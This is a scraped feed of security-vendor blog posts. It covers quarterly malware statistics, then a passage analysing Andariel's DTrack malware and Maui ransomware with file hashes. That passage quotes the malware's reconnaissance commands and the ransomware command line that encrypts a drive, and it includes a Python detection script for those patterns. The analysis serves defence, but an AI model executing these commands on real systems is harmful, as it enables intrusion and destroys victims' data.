RDP also saw the disclosure of several vulnerabilities in the protocol itself, grouped under the common name [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) ([CVE-2019-1181](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1181>), [CVE-2019-1182](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1182>), [CVE-2019-1222](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1222>), [CVE-2019-1223](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1223>), [CVE-2019-1224](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1224>), [CVE-2019-1225](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1225>), [CVE-2019-1226](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1226>)). Unlike the previously discovered [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), these vulnerabilities affect not only old versions of operating systems, but new ones as well, such as Windows 10. As in the case of [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), some [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) vulnerabilities do not require authorization on the attacked system and allow malicious activity to be carried out unnoticed by the user. Therefore, it is vital to promptly install the latest updates for both the operating system and antivirus solutions to reduce the risk of infection.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q3 2019, Kaspersky solutions blocked **989,432,403** attacks launched from online resources located in 203 countries across the globe. **560,025,316** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171508/malware-q3-2019-statistics-en-21.png>)\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Tunisia | 23.26 \n2 | Algeria | 19.75 \n3 | Albania | 18.77 \n4 | R\u00e9union | 16.46 \n5 | Bangladesh | 16.46 \n6 | Venezuela | 16.21 \n7 | North Macedonia | 15.33 \n8 | France | 15.09 \n9 | Qatar | 14.97 \n10 | Martinique | 14.84 \n11 | Greece | 14.59 \n12 | Serbia | 14.36 \n13 | Syria | 13.99 \n14 | Bulgaria | 13.88 \n15 | Philippines | 13.71 \n16 | UAE | 13.64 \n17 | Djibouti | 13.47 \n18 | Morocco | 13.35 \n19 | Belarus | 13.34 \n20 | Saudi Arabia | 13.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 10.97% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171517/malware-q3-2019-statistics-en-22.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. 
They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2019, our File Anti-Virus detected **230,051,054** malicious and potentially unwanted objects.\n\n#### **Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 53.45 \n2 | Tajikistan | 48.43 \n3 | Yemen | 48.39 \n4 | Uzbekistan | 48.38 \n5 | Turkmenistan | 45.95 \n6 | Myanmar | 45.27 \n7 | Ethiopia | 44.18 \n8 | Laos | 43.24 \n9 | Bangladesh | 42.96 \n10 | Mozambique | 41.58 \n11 | Syria | 41.15 \n12 | Vietnam | 41.11 \n13 | Iraq | 41.09 \n14 | Sudan | 40.18 \n15 | Kyrgyzstan | 40.06 \n16 | China | 39.94 \n17 | Rwanda | 39.49 \n18 | Venezuela | 39.18 \n19 | Malawi | 38.81 \n20 | Nepal | 38.38 \n| | \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. 
The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones and external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171525/malware-q3-2019-statistics-en-23.png>)\n\nOverall, 21.1% of user computers globally faced at least one **Malware-class** local threat during Q3.\n\nThe figure for Russia was 24.24%.", "cvss3": {}, "published": "2019-11-29T10:00:19", "type": "securelist", "title": "IT threat evolution Q3 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-1181", "CVE-2019-1182", "CVE-2019-1222", "CVE-2019-1223", "CVE-2019-1224", "CVE-2019-1225", "CVE-2019-1226", "CVE-2019-1367", "CVE-2019-13685", "CVE-2019-13686", "CVE-2019-13687", "CVE-2019-13688", "CVE-2019-14743", "CVE-2019-15315"], "modified": "2019-11-29T10:00:19", "id": "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D", "href": "https://securelist.com/it-threat-evolution-q3-2019-statistics/95269/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." 
Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the target geolocation to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 
2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This payload collects information about the infected host via Windows commands and sends it to the remote host; its functionality is almost identical to that of previous DTrack modules. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface > \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. 
Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using the "-t" and "-x" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. 
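The DTrack command chain and the Maui command line quoted above translate directly into process-creation detection logic. The Python below is an added example, not code from Kaspersky, CISA or Stairwell; it runs over constructed process-creation events on hypothetical hosts HOST-A and HOST-B, where the HOST-A command lines reproduce the ones quoted in this post and HOST-B carries benign noise. The first rule correlates cmd.exe /c invocations of ipconfig, tasklist, netstat, netsh and ping whose output is redirected into the same directory on the same host, and fires only once three or more distinct tools are seen there; the second flags a binary staged under a Temp directory that is launched with a "-t <threads>" count, a "-x" flag and a bare drive-letter target, so it does not depend on the file being called Maui.exe.

```python
"""Detection of the DTrack recon chain and the Maui invocation over
constructed process-creation events (example code, not from the report)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Recon utilities the quoted DTrack in-memory payload drives through cmd.exe /c.
RECON_TOOLS = {"ipconfig", "tasklist", "netstat", "netsh", "ping"}

# cmd.exe /c <tool> <args> > "<output file>"  (tool and redirect target captured)
CMD_REDIRECT_RE = re.compile(
    r'cmd\.exe["\s]+/c\s+(?P<tool>[a-z]+)\b[^>]*>\s*"?(?P<out>[^"\s]+)"?',
    re.IGNORECASE,
)
# Windows-style tokenizer: quoted strings stay whole, everything else splits on space.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# A bare drive letter such as E: or E:\ given as the encryption target.
DRIVE_RE = re.compile(r"[A-Za-z]:\\?")

# Constructed sample events. Host names and the HOST-B lines are hypothetical;
# the HOST-A command lines mirror those quoted in the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "HOST-A", "cmdline": r'"C:\Windows\system32\cmd.exe" /c ipconfig /all > "%Temp%\temp\res.ip"'},
    {"host": "HOST-A", "cmdline": r'"C:\Windows\system32\cmd.exe" /c tasklist > "%Temp%\temp\task.list"'},
    {"host": "HOST-A", "cmdline": r'"C:\Windows\system32\cmd.exe" /c netstat -naop tcp > "%Temp%\temp\netstat.res"'},
    {"host": "HOST-A", "cmdline": r'"C:\Windows\system32\cmd.exe" /c netsh interface show interface > "%Temp%\temp\netsh.res"'},
    {"host": "HOST-A", "cmdline": r'"C:\Windows\system32\cmd.exe" /c ping -n 1 8.8.8.8 > "%Temp%\temp\ping.res"'},
    {"host": "HOST-A", "cmdline": r"C:\Windows\Temp\temp\bin\Maui.exe -t 8 -x E:"},
    # Benign noise: a lone ipconfig, an archiver with a -t7z switch, an installer with -x.
    {"host": "HOST-B", "cmdline": r'"C:\Windows\system32\cmd.exe" /c ipconfig /all > "C:\Users\bob\Desktop\ip.txt"'},
    {"host": "HOST-B", "cmdline": r'"C:\Program Files\7-Zip\7z.exe" a -t7z E:\backup.7z E:\data'},
    {"host": "HOST-B", "cmdline": r"C:\Windows\Temp\setup.exe -x /quiet"},
]


def correlate_recon_chain(events: List[Dict[str, str]], min_tools: int = 3) -> List[dict]:
    """Group redirected recon commands by (host, output directory) and alert
    when at least `min_tools` distinct tools wrote into the same directory."""
    seen: Dict[tuple, set] = defaultdict(set)
    for ev in events:
        m = CMD_REDIRECT_RE.search(ev["cmdline"])
        if not m:
            continue
        tool = m.group("tool").lower()
        if tool not in RECON_TOOLS:
            continue
        out = m.group("out")
        out_dir = out.rsplit("\\", 1)[0].lower() if "\\" in out else ""
        seen[(ev["host"], out_dir)].add(tool)
    return [
        {"rule": "dtrack_recon_chain", "host": host, "out_dir": out_dir, "tools": sorted(tools)}
        for (host, out_dir), tools in seen.items()
        if len(tools) >= min_tools
    ]


def match_maui_args(event: Dict[str, str]) -> Optional[dict]:
    """Flag a binary under a Temp directory run with -t <n>, -x and a drive target."""
    toks = TOKEN_RE.findall(event["cmdline"])
    if not toks:
        return None
    image = toks[0].strip('"')
    if "\\temp\\" not in image.lower():  # staged in a temp directory, as in the incident
        return None
    args = toks[1:]
    threads = None
    for i, tok in enumerate(args[:-1]):
        if tok.lower() == "-t" and args[i + 1].isdigit():
            threads = int(args[i + 1])
    self_melt = any(tok.lower() == "-x" for tok in args)
    targets = [tok for tok in args if DRIVE_RE.fullmatch(tok)]
    if threads is None or not self_melt or not targets:
        return None
    return {"rule": "maui_ransomware_args", "host": event["host"], "image": image,
            "threads": threads, "targets": targets}


def detect(events: List[Dict[str, str]]) -> List[dict]:
    """Run both rules and return all findings."""
    findings = correlate_recon_chain(events)
    findings.extend(f for f in (match_maui_args(ev) for ev in events) if f)
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Thresholding on distinct tools per output directory rather than on any single command keeps the first rule quiet when an administrator runs a lone ipconfig, and keying the second on argument shape plus staging location rather than on a filename means a renamed copy of the binary still trips it.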
In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/